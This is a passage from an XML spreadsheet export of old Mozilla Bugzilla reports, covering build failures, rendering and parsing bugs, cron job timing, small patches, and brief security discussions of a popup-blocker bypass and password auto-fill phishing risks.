Expected Results:  Mozilla/5.0 (X11 U Linux 2.4.2-ac20 i686 en-US 0.9)
(i assume)</t>
  </si>
  <si>
    <t>CORE-50104</t>
  </si>
  <si>
    <t>PLEvent queue needs priority handling</t>
  </si>
  <si>
    <t>Build with LDAP support (see http://www.mozilla.org/directory/xpcom.html for
instructions).
Now via a reasonably fast link (eg the Netscape LAN) visit an LDAP search URL
that returns a lot of directory entries such as 
ldap://memberdir.netscape.com:389/ou=member_directoryo=netcenter.com??sub?(sn=Smith)
The UI will completely stall out on all platforms for quite some time (on my
Linux box it hangs for 45 seconds).
If I do this from a slow link (like my ricochet modem which is ~28.8K) the UI
behaves reasonably (ie the throbber and status bar continue to spin XUL menus
continue to work etc).  Alternately if I sleep a while between callbacks (a la
line 423 of nsLDAPConnection.cpp) the problem goes away.
Doug I took your advice and moved 99% of the callback logic to the LDAP
connection thread (note that nsLDAPChannel.cpp is now compiled with #define
INVOKE_LDAP_CALLBACKS_ON_MAIN_THREAD 0).  This doesn't seem to make any
perceptible difference.
Is it time for event priorities so that events related to the chrome and UI can
take precedence?</t>
  </si>
  <si>
    <t>TOOLKIT-463483</t>
  </si>
  <si>
    <t>matchOnlyTyped no longer honored with special filters</t>
  </si>
  <si>
    <t>The temp table query rewrite caused matchOnlyTyped to be checked for plain queries. We can create a special lazy query as well as dynamically process it for the other special queries.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-427828</t>
  </si>
  <si>
    <t>ActionMonkey busted on Linux</t>
  </si>
  <si>
    <t>libMMgc.a needs to be built and linked into libxul.
/tools/gcc/bin/g++  -fno-rtti -fno-exceptions -Wall -Wconversion -Wpointer-arith -Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy -Wno-non-virtual-dtor -Wcast-align -Wno-long-long -pedantic -fno-strict-aliasing -fshort-wchar -pthread -pipe  -DNDEBUG -DTRIMMED -Os -gstabs+ -fPIC -shared -Wl-zdefs -Wl-hlibxul.so -o libxul.so  nsStaticXULComponents.o nsUnicharUtils.o nsCompressedCharMap.o nsBidiUtils.o nsRDFResource.o     -lpthread   -Wl-rpath-link../../dist/bin  -Wl--whole-archive ../../embedding/browser/gtk/src/libgtkembedmoz.a ../../toolkit/xre/libxulapp_s.a  ../../staticlib/components/libxpconnect.a ../../staticlib/components/libnecko.a ../../staticlib/components/libuconv.a ../../staticlib/components/libi18n.a ../../staticlib/components/libchardet.a ../../staticlib/components/libjar50.a ../../staticlib/components/libpref.a ../../staticlib/components/libcaps.a ../../staticlib/components/libhtmlpars.a ../../staticlib/components/libimglib2.a ../../staticlib/components/libgklayout.a ../../staticlib/components/libdocshell.a ../../staticlib/components/libembedcomponents.a ../../staticlib/components/libwebbrwsr.a ../../staticlib/components/libnsappshell.a ../../staticlib/components/libtxmgr.a ../../staticlib/components/libchrome.a ../../staticlib/components/libcommandlines.a ../../staticlib/components/libtoolkitcomps.a ../../staticlib/components/libpipboot.a ../../staticlib/components/libpipnss.a ../../staticlib/components/libgkplugin.a ../../staticlib/components/libmozfind.a ../../staticlib/components/libappcomps.a ../../staticlib/components/libunixproxy.a ../../staticlib/components/libxpinstall.a ../../staticlib/components/libjsd.a ../../staticlib/components/libautoconfig.a ../../staticlib/components/libauth.a ../../staticlib/components/libcookie.a ../../staticlib/components/libpermissions.a ../../staticlib/components/libuniversalchardet.a ../../staticlib/components/libcomposer.a ../../staticlib/components/librdf.a ../../staticlib/components/libwindowds.a ../../staticlib/components/libintlapp.a ../../staticlib/components/libfileview.a ../../staticlib/components/libstoragecomps.a ../../staticlib/components/libplaces.a ../../staticlib/components/libtkautocomplete.a ../../staticlib/components/libsatchel.a ../../staticlib/components/libpippki.a ../../staticlib/components/libucvmath.a ../../staticlib/components/libwidget_gtk2.a ../../staticlib/components/libsystem-pref.a ../../staticlib/components/libgkgfxthebes.a ../../staticlib/components/libaccessibility.a ../../staticlib/components/libremoteservice.a ../../staticlib/components/libspellchecker.a ../../staticlib/components/libzipwriter.a ../../staticlib/libxpcom_core.a ../../staticlib/libucvutil_s.a ../../staticlib/libgkgfx.a ../../staticlib/libgfxshared_s.a ../../staticlib/libmozreg_s.a ../../staticlib/libmorkreader_s.a ../../staticlib/libgtkxtbin.a ../../staticlib/libgfxpsshar.a ../../staticlib/libthebes.a  -Wl--no-whole-archive -L../../dist/lib -lsqlite3 -L../../dist/bin  -L../../dist/bin -L../../jpeg -lmozjpeg -L../../modules/libimg/png -lmozpng -L../../dist/bin -lmozlcms -L../../dist/bin -lmozjs -L../../dist/bin -lcrmf -lsmime3 -lssl3 -lnss3 -lnssutil3 -lsoftokn3  -L../../modules/zlib/src -lmozz -L/lib -lpangocairo-1.0 -lcairo -lpangoft2-1.0 -lpango-1.0 -lgobject-2.0 -lgmodule-2.0 -ldl -lglib-2.0   ../../gfx/cairo/cairo/src/libmozcairo.a ../../gfx/cairo/libpixman/src/libmozlibpixman.a   -lXrender -lfreetype -lfontconfig -L../../dist/lib -lplds4 -lplc4 -lnspr4 -lpthread -ldl  -lX11  -lXft -lXrender -lfontconfig -lfreetype -lX11   -L/lib -lgtk-x11-2.0 -latk-1.0 -lgdk-x11-2.0 -lgdk_pixbuf-2.0 -lm -lpangocairo-1.0 -lpango-1.0 -lcairo -lgmodule-2.0 -ldl -lgobject-2.0 -lglib-2.0   -lXt -lgthread-2.0 -lfreetype ../../memory/jemalloc/libjemalloc.a -ldl -lm     
../../staticlib/components/libxpconnect.a(nsScriptError.o): In function `nsScriptError::~nsScriptError()':
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/tamarin/MMgc/GCGlobalNew.h:73: undefined reference to `MMgc::FixedMalloc::instance'
../../staticlib/components/libxpconnect.a(nsScriptError.o): In function `nsScriptError::GetColumnNumber(unsigned int*)':
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/src/xpconnect/src/nsScriptError.cpp:106: undefined reference to `MMgc::GCHeap::Free(void*)'
../../staticlib/components/libxpconnect.a(nsScriptError.o): In function `nsScriptError::Init(unsigned short const* unsigned short const* unsigned short const* unsigned int unsigned int unsigned int char const*)':
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/src/xpconnect/src/nsScriptError.cpp:132: undefined reference to `MMgc::FixedAlloc::FreeChunk(MMgc::FixedAlloc::FixedBlock*)'
../../staticlib/components/libxpconnect.a(nsXPConnect.o): In function `nsXPConnect::GetXPConnect()':
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/tamarin/MMgc/GCGlobalNew.h:58: undefined reference to `MMgc::FixedMalloc::instance'
../../staticlib/components/libxpconnect.a(nsXPConnect.o): In function `nsXPConnect::~nsXPConnect()':
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/tamarin/MMgc/GCGlobalNew.h:73: undefined reference to `MMgc::FixedMalloc::instance'
../../staticlib/components/libxpconnect.a(nsXPConnect.o): In function `nsXPConnect::~nsXPConnect()':
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/tamarin/MMgc/GCGlobalNew.h:73: undefined reference to `MMgc::FixedMalloc::instance'
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/tamarin/MMgc/GCGlobalNew.h:73: undefined reference to `MMgc::FixedMalloc::instance'
../../staticlib/components/libxpconnect.a(nsXPConnect.o): In function `nsXPConnect::~nsXPConnect()':
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/tamarin/MMgc/GCGlobalNew.h:73: undefined reference to `MMgc::FixedMalloc::instance'
../../staticlib/components/libxpconnect.a(nsXPConnect.o): In function `non-virtual thunk to nsXPConnect::BeginCycleCollection(nsCycleCollectionTraversalCallback&amp;)':
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/src/xpconnect/src/nsXPConnect.cpp:(.gnu.linkonce.t._ZN4MMgc10FixedAlloc5AllocEj+0x24): undefined reference to `MMgc::FixedAlloc::CreateChunk()'
../../staticlib/components/libxpconnect.a(nsXPConnect.o): In function `nsXPConnect::JSContextParticipant()':
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/src/xpconnect/src/nsXPConnect.cpp:1035: undefined reference to `MMgc::FixedAlloc::CreateChunk()'
../../staticlib/components/libxpconnect.a(nsXPConnect.o): In function `non-virtual thunk to nsXPConnect::BeginCycleCollection(nsCycleCollectionTraversalCallback&amp;)':
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/src/xpconnect/src/nsXPConnect.cpp:(.gnu.linkonce.t._ZN4MMgc11FixedMalloc10LargeAllocEj+0x28): undefined reference to `MMgc::GCHeap::Alloc(int bool bool)'
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/src/xpconnect/src/nsXPConnect.cpp:(.gnu.linkonce.t._ZN4MMgc11FixedMalloc5AllocEj+0x35): undefined reference to `MMgc::FixedMalloc::FindSizeClass(unsigned int) const'
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/src/xpconnect/src/nsXPConnect.cpp:(.gnu.linkonce.t._ZN14AutoMarkingPtrD0Ev+0x24): undefined reference to `MMgc::FixedMalloc::instance'
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/src/xpconnect/src/nsXPConnect.cpp:(.gnu.linkonce.t._ZN29AutoMarkingNativeInterfacePtrD0Ev+0x24): undefined reference to `MMgc::FixedMalloc::instance'
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/src/xpconnect/src/nsXPConnect.cpp:(.gnu.linkonce.t._ZN32AutoMarkingWrappedNativeProtoPtrD0Ev+0x24): undefined reference to `MMgc::FixedMalloc::instance'
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/src/xpconnect/src/nsXPConnect.cpp:(.gnu.linkonce.t._ZN16AutoMarkingJSValD0Ev+0x23): undefined reference to `MMgc::FixedMalloc::instance'
../../staticlib/components/libxpconnect.a(xpccallcontext.o): In function `XPCCallContext::DeleteString(nsAString_internal*)':
/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/tamarin/MMgc/GCGlobalNew.h:73: undefined reference to `MMgc::FixedMalloc::instance'
../../staticlib/components/libxpconnect.a(xpccallcontext.o):/builds/buildbot/moz2-slave/actionmonkey-linux/build/js/tamarin/MMgc/GCGlobalNew.h:58: more undefined references to `MMgc::FixedMalloc::instance' follow
collect2: ld returned 1 exit status
gmake[4]: *** [libxul.so] Error 1
gmake[4]: Leaving directory `/builds/buildbot/moz2-slave/actionmonkey-linux/build/obj-firefox/toolkit/library'
gmake[3]: *** [libs_tier_toolkit] Error 2
gmake[3]: Leaving directory `/builds/buildbot/moz2-slave/actionmonkey-linux/build/obj-firefox'
gmake[2]: *** [tier_toolkit] Error 2
gmake[2]: Leaving directory `/builds/buildbot/moz2-slave/actionmonkey-linux/build/obj-firefox'
make[1]: *** [default] Error 2
make[1]: Leaving directory `/builds/buildbot/moz2-slave/actionmonkey-linux/build/obj-firefox'
make: *** [build] Error 2</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-131480</t>
  </si>
  <si>
    <t>Can't do 2 successive history searches</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:0.9.9+)
Gecko/20020301
BuildID:    2002031620
Reproducible: Always
Steps to Reproduce:
1.Ctrl +h
2.You have 1 window History
3.Ctrl +F
4 Search something and hit enter
5 You now have 2 windows History + Search Results
6 Go back to History *without* closing Search Results
7 Ctrl +F
8 Search something else
Actual Results:  10 Nothing happens there is no user feedback nothing
Expected Results:  A second search Results window should be opened or the one
and only
Search results windows should be reused *and* bring to the top
I was stuck and I hit enter several times til
I realized I had to manually close the first Search results
window *before* submitting a second search
This is very poor UE</t>
  </si>
  <si>
    <t>bernard.alleysson</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-488887</t>
  </si>
  <si>
    <t>Copy of places.sqlite please?</t>
  </si>
  <si>
    <t>I'd like to get a copy of the places.sqlite file after a Tp run on OS X.  I don't care about 10.4/10.5 since the regression from bug 487664 showed up on both (but only OS X).  Doesn't matter what run either.
Thanks!</t>
  </si>
  <si>
    <t>CORE-123267</t>
  </si>
  <si>
    <t>an unclosed  tag adds lots more  elements to DOM</t>
  </si>
  <si>
    <t>currently    and maybe a few other formatting tags get
propagated when they are not closed. For example:
test test2
will give this:
[div]
  [span]
    [b]
      test
  [b]
    [span]
      test
[b]
another example:
test test2
will give:
[div]
  [span]
    [b]
      test
  [b]
    [span]
      [b]
        test
[b]
  [b]
this becomes an issue however when one has something like:
  item1
  item2
  item3
  item4
  item5
  item6
  item7
which will give:
[ul]
 [li]
  [b]
   item1
 [li]
  [b]
   [b]
    item2
 [li]
  [b]
   [b]
    [b]
     item3
 [li]
  [b]
   [b]
    [b]
     [b]
      item4
 [li]
  [b]
   [b]
    [b]
     [b]
      [b]
       item5
 [li]
  [b]
   [b]
    [b]
     [b]
      [b]
       [b]
        item6
 [li]
  [b]
   [b]
    [b]
     [b]
      [b]
       [b]
        [b]
         item7
[b]
 [b]
  [b]
   [b]
    [b]
     [b]
      [b]
one idea I had was to not to insert a [b] when the parent node is already a [b].
But a that will not help in a case like:
  item1
  item2
  item3
  item4
  item5
  item6
  item7
Another idea I had was to use a  element that will have its style set
according to these formatting tags. For example:
  item1
  item2
  item3
  item4
  item5
  item6
  item7
will become:
[ul]
  [li]
    [b]
      item1
  [li]
    [span style=font-weight: bold]
      [font size=1]
        item2
  [li]
    [span style=font-weight: boldfont-size: xx-small]
      [b]
        item3
  [li]
    [span style=font-weight: boldfont-size: xx-small]
      [font size=2]
        item4
  [li]
    [span style=font-weight: boldfont-size: x-small]
      [b]
        item5
  [li]
    [span style=font-weight: boldfont-size: x-small]
      [font size=3]
        item6
  [li]
    [span style=font-weight: boldfont-size: small]
      [b]
        item7
[span style=font-weight: boldfont-size: small]
However it will not work with something like:
  item1
  item2
  item3
  item4
  item5
  item6
  item7
this feature also causes issues like if I do:
  item1
  item2
I get:
[ul]
 [li]
  [b id=b1]
   item1
 [li]
  [b id=b1]
   [b id=b2]
    item2
[b id=b1]
 [b id=b2]
At any rate usage of the formatting tags this way is just plain bad html and
this way of parsing causes the DOM to grow alot larger sometimes causes some
content to be lost in the process and sometimes causes moz to
freeze/slowdown/crash on seemingly simple pages (see bug 84466 for an extreme case).
I would suggest turning this feature off (by closing the formatting tags when
the parent tag is closed) and evangelize anyone who uses the tags this way and
expect it to propagate.</t>
  </si>
  <si>
    <t>basic</t>
  </si>
  <si>
    <t>CORE-235457</t>
  </si>
  <si>
    <t>blocked popup window opened from menu circumvents content restrictions</t>
  </si>
  <si>
    <t>A blocked popup window opened from the list of blocked popups (see bug 198846)
is opened with chrome privileges. This means for example that while an attempt
from web content to open a window like so
open(sneaky.html _blank top=3000left=3000height=1width=1)
will be caught and turned into a visible window it will however be opened
invisible just as requested from the list of blocked popup windows.</t>
  </si>
  <si>
    <t>TOOLKIT-260003</t>
  </si>
  <si>
    <t>Firefox 1.0 pre release: pressing RETURN in empty search field should not print Phrase not found</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040913 Firefox/0.10
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040913 Firefox/0.10
There is the new search bar in Firefox 1.0. If the edit field is empty and I
press RETURN Phrase not found is printed.
I think in this case nothing should happen.
(Previous versions of Firefox also have done nothing if confirming the empty
search window.)
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>TOOLKIT-428518</t>
  </si>
  <si>
    <t>source server final round</t>
  </si>
  <si>
    <t>Ok we're so close. I think the biggest problem was using msys cvs.exe it seemed to be unable to checkout to the correct directory. I linked a better cvs.exe in http://developer.mozilla.org/en/docs/Using_the_Mozilla_source_server#What_you.27ll_need . I currently have srcsrv working with these lines in my srcsrv.ini:
MYSERVER=:pserver:anonymous@cvs-mirror.mozilla.org:/cvsroot
CVS_EXTRACT_CMD=%fnchdir%(%targ%)cvs.exe -d %fnvar%(%var2%) checkout -r %var4% -d %var4% -N %var3%
SRCSRVTRG=%targ%\%var4%\%fnbksl%(%var3%)
The second two are easy tweaks to make it check out to the right dir and also to include the version number in the checkout path so it will work properly in the face of updated sources.
I also think given how the CVSROOT thing worked out that we should allow specifying the CVSROOT to use via environment variable so that we can get a solution that doesn't require touching srcsrv.ini. We can just see if SRCSRV_ROOT is set in the environment and use that instead of whatever we find from CVS/Root. That way we can just specify it in the mozconfig and everything works. Shouldn't be too hard!</t>
  </si>
  <si>
    <t>WEBTOOLS-18587</t>
  </si>
  <si>
    <t>LXR Filters out quoted zeros.</t>
  </si>
  <si>
    <t>The following source line is supposed to have a zero (0) in quotes but lxr
shows it as an empty string.
http://lxr.mozilla.org/seamonkey/source/js/src/jsstr.h#147
I wonder what happened here and I wonder if there are other cases where lxr
shows the wrong string.</t>
  </si>
  <si>
    <t>CORE-108750</t>
  </si>
  <si>
    <t>split nsDOMCSSAttributeDeclaration into its own file</t>
  </si>
  <si>
    <t>We should split nsDOMCSSAttributeDeclaration into its own file for two reasons:
 1. bug 107101 reorganizing CSS into logical directory structure
 2. putting CSS back into layout
The patch I'm about to attach should be sufficient for both.</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-416454</t>
  </si>
  <si>
    <t>Minor cleanup (including source positions)</t>
  </si>
  <si>
    <t>Created attachment 302212
Patch
Merges some parts of the patch for bug 415747 and further improves source line printing in error messages.
Cleans up some comments and adds some more.
Removes one debug print that was annoying.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-187342</t>
  </si>
  <si>
    <t>DOM Ref window.innerWidth change</t>
  </si>
  <si>
    <t>Window.innerWidth
type: readonly
value: number
description:
the width of the window including the scrollbar but excluding any other chrome
such as window borders sidebars et c.</t>
  </si>
  <si>
    <t>dhtmlkitchen</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-526553</t>
  </si>
  <si>
    <t>[AMO] Adjust timing of cron jobs</t>
  </si>
  <si>
    <t>There are 5 cron jobs that represent by far the bulk of the errors we're seeing right now and each runs once every 20 minutes:
02040 * * * * root cd /data/amo/www/addons.mozilla.org-remora/bin  /usr/bin/python26 maintenance.py total
103050 * * * * root cd /data/amo/www/addons.mozilla.org-remora/bin  /usr/bin/python26 maintenance.py weekly
52545 * * * * root cd /data/amo/www/addons.mozilla.org-remora/bin  php -f maintenance.php reviews
153555 * * * * root cd /data/amo/www/addons.mozilla.org-remora/bin  php -f maintenance.php ratings
163656 * * * * root cd /data/amo/www/addons.mozilla.org-remora/bin  php -f maintenance.php user_ratings
Can you adjust each of these on preview and production so they run only twice per hour?  Hopefully that will relieve some pressure we're feeling.</t>
  </si>
  <si>
    <t>CORE-368840</t>
  </si>
  <si>
    <t>Fallback paint should be used for degenerate objectBoundingBox gradients</t>
  </si>
  <si>
    <t>Created attachment 253487
testcase (with and without fallback specified)
The last paragraph of the following section indicates that objectBoundingBox gradients should be ignored when the width or height of the object is zero.  We should use the fallback color in that case.
  http://www.w3.org/TR/SVG11/coords.html#ObjectBoundingBox</t>
  </si>
  <si>
    <t>FIREFOX-245614</t>
  </si>
  <si>
    <t>After add  cookie exception buttons Allow and Block are not grayed.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a2) Gecko/20040604 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a2) Gecko/20040604 Firefox/0.8
I do not speak English.  I hope that it is comprehensible.
Reproducible: Always
Steps to Reproduce:
1. Tools/options.../Privacy/Cookies/Exceptions... (buttons are grayed)
2. Type url (buttons are not grayed)
3. Click Allow (buttons are not grayed... this not good...)
4. Click again (That adds an empty URL... no good...)</t>
  </si>
  <si>
    <t>electron</t>
  </si>
  <si>
    <t>CORE-525411</t>
  </si>
  <si>
    <t>lirasm: fix CallInfo problems</t>
  </si>
  <si>
    <t>Created attachment 409288
patch
The handling of calls in lirasm is currently screwy.  In particular we
infer the CallInfo details of a function entirely from the call site.  But
we currently get the arg types wrong in some cases on X64.  This patch fixes
this. 
Furthermore for built-in functions inferring isn't a good idea we should
check the call site details against the existing CallInfo details instead.
So the patch does that as well.  This will catch some asm code errors.
Also calling blocks by their address (eg. call 0x1234 fastcall) seems 
like a terrible idea and isn't currently used AFAICT.  So I removed this
functionality. 
As a result of this patch a couple of the lirasm tests that previously 
asserted on X64 now pass.</t>
  </si>
  <si>
    <t>CALENDAR-449031</t>
  </si>
  <si>
    <t>Provider: Local Storage</t>
  </si>
  <si>
    <t>Add meta data API to memory/storage</t>
  </si>
  <si>
    <t>For the purpose of synchronizing remote calendars with the local cache it's sensible to have meta data stored with items.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-372739</t>
  </si>
  <si>
    <t>Support duration types for Range</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1 formsPlayer 1.4 .NET CLR 1.1.4322 .NET CLR 2.0.50727)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a3pre) Gecko/20070216 Minefield/3.0a3pre
Separate bug for implementing duration types for range: dayTimeDuration and yearMonthDuration.
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-382595</t>
  </si>
  <si>
    <t>SVG image is covered with horizontal lines when scrolled - recent regression</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a5pre) Gecko/20070530 Minefield/3.0a5pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a5pre) Gecko/20070530 Minefield/3.0a5pre
In the attached test case an SVG image is contained within a frame with an explicitly-specified frame border. When the image initially renders a spurious horizontal line is present. Scrolling the image causes it to become covered in horizontal lines.
Reproducible: Always
Steps to Reproduce:
1. Open the attached test.html
2. Click the button Click Me.
3. A popup window appears with two frames in which frame1 contains another Click Me button. click this.
4. An SVG image appears in frame 2.
5. Scroll the image up and down.
Actual Results:  
After step 4 the SVG image has a spurious horizontal line.
After step 5 the SVG image is covered in horizontal lines.
Expected Results:  
The SVG should not have any horizontal lines on it.
Essential to the test case are
(i) Use of a popup window (OK if frameset.html is loaded directly)
(ii) Use of an explicitly-specified frame border (OK with default border)
(iii) Loading the SVG in frame 2 from an on-click event in frame 1 (OK if loaded by specifying src=frame2.html in the frameset).
Regression in the last few weeks.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-487814</t>
  </si>
  <si>
    <t>[cy] accidental check-in to region.properties needs fixing</t>
  </si>
  <si>
    <t>The landing http://hg.mozilla.org/releases/l10n-mozilla-1.9.1/cy/diff/207435a98a9b/browser/chrome/browser-region/region.properties needs fixing.
At least the mibbit part is technically wrong.</t>
  </si>
  <si>
    <t>SEAMONKEY-160546</t>
  </si>
  <si>
    <t>make mail.addr_book.displayName.lastnamefirst localizable</t>
  </si>
  <si>
    <t>http://lxr.mozilla.org/seamonkey/source/modules/libpref/src/init/mailnews.js#135
135 pref(mail.addr_book.displayName.lastnamefirst false) // generate display
names in last first order
This is related to bug 160544 (Localizability for address book UI first name
last name order). FN/LN order is different depends on the locale so it needs to
be localizable.</t>
  </si>
  <si>
    <t>CORE-86220</t>
  </si>
  <si>
    <t>strict mode table row background to wide</t>
  </si>
  <si>
    <t>In strict mode we draw the table row background to wide. It is a leftover from
some ancient days we are off exactly by the cellspacing we introduce in the
paint method. All reflow debuuging shows to me that we the comment in the code
is no longer valid. testcase + patch will follow</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-361463</t>
  </si>
  <si>
    <t>Address security concerns with keychain password auto-fill in forms</t>
  </si>
  <si>
    <t>Camino is going to have to resolve bug 360493 and related issues separately from any Firefox/core decisions.
One option that's been discussed there is to not fill any form where the form action host doesn't match the page host. That's probably a good step although we need to figure if there are a significant number of sites doing that legitimately (e.g. bar.foo.com's form submits to login.foo.com). However there's a class of attack that that approach doesn't address.
Another option which I've tossed out in 360493 is as follows:
Remember passwords for a domain but also remember white-/black-lists of URLs for each one and prompt the user for any new URL. E.g. if a user logs in to foo.com/login.html and stores the password the password would auto-fill on foo.com/login.html. If the user goes to foo.com/login-try-again.html they would get an alert and choose whether or not they want to fill there (with an option to remember).
The warning is a weak point since it involves a user decision about security but it could at least be made very understandable (and with a no default) something to the effect of:
-------------
This page has a log-in form. If you are trying to log in to foo.com you can fill it with your saved account information. If you are not trying to log to foo.com this may be an attempt to steal your password.
[Fill Form] [Don't Fill Form]
| | remember this decision
-------------
The biggest issue here would be user-management of the URL white-/black-lists but I'm not sure it's the sort of thing that would be wrong enough that we'd actually need to worry too much about it (since the user would have to check the remember box explicitly).</t>
  </si>
  <si>
    <t>TOOLKIT-452657</t>
  </si>
  <si>
    <t>Remove richview from toolkit</t>
  </si>
  <si>
    <t>The richview is no longer used and should be removed. Filing under app update since it lives under toolkit/mozapps/shared and was never an official toolkit widget.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-123699</t>
  </si>
  <si>
    <t>Cache MIME converter in nsMsgI18N.cpp</t>
  </si>
  <si>
    <t>nsMsgI18NEncodeMimePartIIStr creates the converter object everytime it's called.
That can be cached and released at shutdown.
http://lxr.mozilla.org/seamonkey/source/mailnews/base/util/nsMsgI18N.cpp#399</t>
  </si>
  <si>
    <t>TESTING-483407</t>
  </si>
  <si>
    <t>Improve the mochitest* harness</t>
  </si>
  <si>
    <t>A few things I noticed: see following patches.</t>
  </si>
  <si>
    <t>FIREFOX-340444</t>
  </si>
  <si>
    <t>SuggestionURL should be SuggestionUrl for consistency with opensearch Url tag</t>
  </si>
  <si>
    <t>The non-standard SuggestionURL tag in search plugin's description has inconsistent capitalization compared to OpenSearch-defined Url tag.
While consistently using URL would be a better choice the OpenSearch spec is not under our control so we should use SuggestionUrl for consistency.</t>
  </si>
  <si>
    <t>THUNDERBIRD-405303</t>
  </si>
  <si>
    <t>Add ID to View -&gt; Layout menupopup to make overlaying easier for extensions (e.g. Lightning)</t>
  </si>
  <si>
    <t>Created attachment 290100
Add ID
The View -&gt; Layout menupopup currently doesn't have an ID which makes it really hard for extensions to hook up to this menu.
See http://mxr.mozilla.org/mozilla/source/calendar/base/content/today-pane.js#92 up until line 111 to see the ugliness that this caused to Lightning for example.
Since this is an extremely low-risk patch it would be good to get this on the 1.8 branch as well as we're (Lightning Team) are currently doing most of our development there.</t>
  </si>
  <si>
    <t>CORE-80011</t>
  </si>
  <si>
    <t>Page is retrieved from the cache</t>
  </si>
  <si>
    <t>When the new cache landed I have troubles to update some pages.
1. Example 1 - www.ixbt.com.
I read this page some times a day. But now I must hit shift-reload when I want
read the latest updates.
I happens in 1 session and after restarting mozilla.
2. Example 2 - http://forex.mdmbank.com/finance/forex/info.htm?cur1=EUR&amp;cur2=USD
Open this page. Every 1 minute the image changes. With other browsers I can just
hit relad and the new one is here but with mozilla now I must hit shift-reload.
moz 2001050720</t>
  </si>
  <si>
    <t>ezh</t>
  </si>
  <si>
    <t>CORE-13676</t>
  </si>
  <si>
    <t>va_args type violation in js/src/jsapi.c</t>
  </si>
  <si>
    <t>(linux/ppc with gcc-2.95.2pre)
while linking libmozjs.so to anything it crashes with undefined reference to
__va_arg_type_violation obviously a bad va_arg call.  i've located it in
js/src/jsapi.c and with the help of Franz Sirl 
i've found 2 bad va_arg()'s here's a fix:
--- jsapi.c.orig        Mon Sep 13 11:31:20 1999
+++ jsapi.c     Mon Sep 13 11:32:11 1999
@@ -27610 +27711 @@
            continue
        switch (c) {
          case 'b':
-           *sp = BOOLEAN_TO_JSVAL(va_arg(ap JSBool))
+           *sp = BOOLEAN_TO_JSVAL((JSBool)va_arg(ap int))
            break
          case 'c':
-           *sp = INT_TO_JSVAL(va_arg(ap uint16))
+           *sp = INT_TO_JSVAL((uint16) va_arg(ap unsigned int))
            break
          case 'i':
          case 'j':</t>
  </si>
  <si>
    <t>ajoshi</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-259793</t>
  </si>
  <si>
    <t>Please update ConQuery</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.7.3) Gecko/20040913 Firefox/0.10
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.7.3) Gecko/20040913 Firefox/0.10
Extension name: ConQuery
Release date: 2004-09-16
Version: 1.2.1
XPI URL: http://downloads.mozdev.org/conquery/conquery121.xpi
Description: Allows to query web services by context menu of the browser.
Queries may contain various parameters of curriently browsing web page: selected
text URL host etc. Can be used just for searching and as well for working with
advanced complex web services.
Target application: FireFox ({ec8030f7-c20a-464f-9b0e-13a3a9e97384})
MinVersion: 0.9 MaxVersion: 0.10
Target application: Mozilla ({86c18b42-e466-45a9-ae7a-9b95ba6f5640})
MinVersion: 1.0 MaxVersion: 1.7
Target application: Thunderbird ({3550f703-e582-4d05-9a08-453d09bdfdc6})
MinVersion: 0.6 MaxVersion: 0.8
Author: Vasa Maximov (mcv@mozdev.org)
Homepage url: http://conquery.mozdev.org/
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>mcv</t>
  </si>
  <si>
    <t>CALENDAR-296193</t>
  </si>
  <si>
    <t>fresh profile startup: currentView/multiweekView has no properties (rootCalendarPrefs) [trunk]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b2) Gecko/20050526 Mozilla Sunbird/0.2+
Starting up sunbird on a fresh profile produces errors in JS console (and no
initial calendar).
Reproducible: Always
Steps to Reproduce:
